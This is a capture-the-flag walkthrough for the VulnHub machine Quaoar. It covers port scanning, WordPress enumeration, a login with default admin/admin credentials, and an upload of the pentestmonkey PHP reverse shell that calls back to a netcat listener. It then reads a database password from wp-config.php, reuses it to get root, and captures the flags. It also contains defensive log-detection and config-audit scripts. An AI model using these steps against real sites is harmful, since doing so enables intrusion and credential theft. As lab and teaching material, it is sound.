For background information on this series of CTFs you may want to read this page. Or if you're just after my solution, please keep reading.
This is the first of 3 incrementally difficult CTFs created for HackFest 2016 by @ViperBlackSkull and released on the VulnHub platform.
Difficulty: Very Easy
As always, start with an Nmap scan to see what ports are open:
```
root@kali:~/VulnHub/quaoar# nmap -p- -Pn -v -T4 -A 192.168.5.11
. . . SNIP . . .
Scanning 192.168.5.11 [65535 ports]
Discovered open port 22/tcp on 192.168.5.11
Discovered open port 80/tcp on 192.168.5.11
Discovered open port 993/tcp on 192.168.5.11
Discovered open port 110/tcp on 192.168.5.11
Discovered open port 995/tcp on 192.168.5.11
Discovered open port 139/tcp on 192.168.5.11
Discovered open port 143/tcp on 192.168.5.11
Discovered open port 53/tcp on 192.168.5.11
Discovered open port 445/tcp on 192.168.5.11
. . . SNIP . . .
```
Plenty there, but let's start with the web service on port 80.
Loading the page in a browser gives us a splash screen and a couple of images, not much else.
So throw nikto at it to see what we can find.
The most interesting point it returned was:
Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
Loading the page shows us a basic WordPress install.
Kali comes with a tool to scan WordPress sites: wpscan. This tool is capable of enumerating users and plugins, and can show you whether there are vulnerabilities associated with the version numbers it discovers.
```
root@TechKali:~# wpscan -u http://192.168.5.11/wordpress -e u
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.5.11/wordpress/
[+] Started: Tue Mar 21 19:26:36 2017

[!] The WordPress 'http://192.168.5.11/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.5.11/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.5.11/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.5.11/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 8 vulnerabilities identified from the version number
```
Most of the vulnerabilities are XSS or CSRF but there is an SQL Injection listed.
```
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16
```
And a list of usernames:
```
[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used
```
I started looking for more details on the SQLi but couldn't find a lot of detailed information. It looks like it needed to be coupled with a plugin that mishandles post type names.
While I was researching, I figured I may as well throw some creds at the logon form. Hydra is capable of doing this, but I like to use ZAP for its ease of use and feedback.
Username admin password admin makes this one easy.
If you have admin access to a WordPress install, the easiest thing to do is just to upload a PHP reverse shell. I like to use the one from pentestmonkey that's included in Kali.
Start by copying the file, then edit it using your fav editor to change the callback IP and port. Then set a netcat listener.
```
root@kali:~/VulnHub/quaoar# cp /usr/share/webshells/php/php-reverse-shell.php shell.php
root@kali:~/VulnHub/quaoar# nano shell.php
root@kali:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...
```
Back on WordPress, select the plugin page from the left-hand menu, click ‘Add New’ and look for the link to upload a plugin in zip format.
After clicking this link, select and upload your PHP page.
Ignore any errors that are generated on the next page and click on Media from the left-hand menu. You should see your PHP file listed. Click the file in the browser to show its details and get the link from the description or URL fields. In my case it's ‘/wordpress/wp-content/uploads/2017/04/shell.php’.
Double check your netcat listener is still active and visit this page in a browser. With any luck you should see a connection in netcat.
```
root@kali:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.11: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.11] 48435
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 athlon i386 GNU/Linux
 16:20:17 up 5:40, 0 users, load average: 0.29, 0.13, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```
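Seen from the defender's side, both the guessed admin login and the PHP file served out of the uploads directory leave traces in the web server's access log. The following detector is an added example, not part of the original write-up; the log lines are constructed, and the threshold and rule names are assumptions.

```python
import re
from collections import Counter

# Apache combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Script extensions that should never be served from the media directory.
SCRIPT_IN_UPLOADS = re.compile(
    r'/wp-content/uploads/.*\.(?:php\d?|phtml|phar)(?:$|[/?])', re.I)
LOGIN_THRESHOLD = 3  # assumed: failed logins from one client before a success is suspicious

# Constructed sample lines; only the upload path and client address mirror the write-up.
SAMPLE_LOG = """\
10.0.8.2 - - [01/Apr/2017:16:01:10 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3120
10.0.8.2 - - [01/Apr/2017:16:01:11 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3120
10.0.8.2 - - [01/Apr/2017:16:01:12 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3120
10.0.8.2 - - [01/Apr/2017:16:01:13 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.5.50 - - [01/Apr/2017:16:05:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.5.50 - - [01/Apr/2017:16:05:09 +0000] "GET /wordpress/wp-content/uploads/2017/04/logo.png HTTP/1.1" 200 5120
10.0.8.2 - - [01/Apr/2017:16:20:17 +0000] "GET /wordpress/wp-content/uploads/2017/04/shell.php HTTP/1.1" 200 0
10.0.8.2 - - [01/Apr/2017:16:21:00 +0000] "GET /wordpress/wp-content/uploads/2017/04/old.php HTTP/1.1" 404 290
"""

def analyse(log_text):
    """Return (rule, client, detail) alerts for login guessing and scripts in uploads."""
    failed = Counter()
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m["ip"], m["path"], int(m["status"])
        if m["method"] == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            if status == 200:      # WordPress re-renders the form on a failed login
                failed[ip] += 1
            elif status == 302 and failed[ip] >= LOGIN_THRESHOLD:
                alerts.append(("login-after-guessing", ip, failed[ip]))
        elif status < 400 and SCRIPT_IN_UPLOADS.search(path):
            alerts.append(("script-in-uploads", ip, path))
    return alerts

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The second rule pairs naturally with a web server setting that refuses to execute scripts under wp-content/uploads, so that a hit means an attempt rather than a running shell.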
One of the first things I do when I get a limited shell is spawn a Python tty shell and get a file listing of the box. In this instance I write it out to the web dir so I can transfer files back to me from the browser.
```
root@kali:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.11: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.11] 48435
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 athlon i386 GNU/Linux
 16:20:17 up 5:40, 0 users, load average: 0.29, 0.13, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Quaoar:/$ find / > /var/www/dirs.txt
```
We are looking for flags, so a quick grep in dirs.txt gives us one.
```
www-data@Quaoar:/$ cat /home/wpadmin/flag.txt
cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e
www-data@Quaoar:/$
```
Now let's see what we have that can get us escalated privileges. WordPress is connected to MySQL and we can read the credentials from the wp-config.php file.
If you didn’t know where it was you could search for it in dirs.txt, but either way:
```
www-data@Quaoar:/$ cat /var/www/wordpress/wp-config.php
cat /var/www/wordpress/wp-config.php
. . . SNIP . . .
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
. . . SNIP . . .
```
Password reuse is fairly common and this case is no exception. The SQL root password is the same as the host root password.
```
www-data@Quaoar:/$ su
su
Password: rootpassword!
root@Quaoar:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Quaoar:/#
```
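The wp-config.php settings read above can be audited automatically. This is an added example, not part of the original write-up: it parses the define() lines and flags a database account with administrative rights, a password that contains the account name, and a world-readable file. The account list, minimum length and finding names are assumptions, and it cannot tell whether the password is reused for a system account.

```python
import re

# define('NAME', 'value') with single or double quotes, as written in wp-config.php
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<key>\w+)\1\s*,\s*(['"])(?P<val>(?:\\.|(?!\3).)*)\3\s*\)""")

ADMIN_DB_USERS = {"root", "admin", "mysql"}  # assumed: accounts an application should not use
MIN_PASSWORD_LEN = 12                        # assumed local policy

# The excerpt shown in the write-up, with its line breaks restored.
PAGE_CONFIG = """\
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
"""

def parse_defines(php_text):
    """Return {constant: value}, ignoring defines that are commented out."""
    text = re.sub(r"/\*.*?\*/", "", php_text, flags=re.S)   # block comments
    text = re.sub(r"(?m)^\s*(?://|#).*$", "", text)         # whole-line comments
    return {m["key"]: m["val"] for m in DEFINE_RE.finditer(text)}

def audit_wp_config(php_text, mode=None):
    """Return a list of finding names; mode is the file's permission bits, if known."""
    cfg = parse_defines(php_text)
    user, password = cfg.get("DB_USER", ""), cfg.get("DB_PASSWORD", "")
    findings = []
    if user.lower() in ADMIN_DB_USERS:
        findings.append("db-admin-account")
    if user and user.lower() in password.lower():
        findings.append("password-contains-username")
    if len(password) < MIN_PASSWORD_LEN:
        findings.append("password-too-short")
    if mode is not None and mode & 0o004:
        findings.append("world-readable")
    return findings

if __name__ == "__main__":
    print(audit_wp_config(PAGE_CONFIG, mode=0o644))
```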
Now that we have root, we have a second flag in /root/flag.txt:
```
root@Quaoar:/# find / -name flag.txt
find / -name flag.txt
/root/flag.txt
/home/wpadmin/flag.txt
root@Quaoar:/# cat /root/flag.txt
cat /root/flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:/#
```
Well, that’s it for this one. Difficulty was spot on: Very Easy. On to the next one.
As usual, questions, queries and comments below.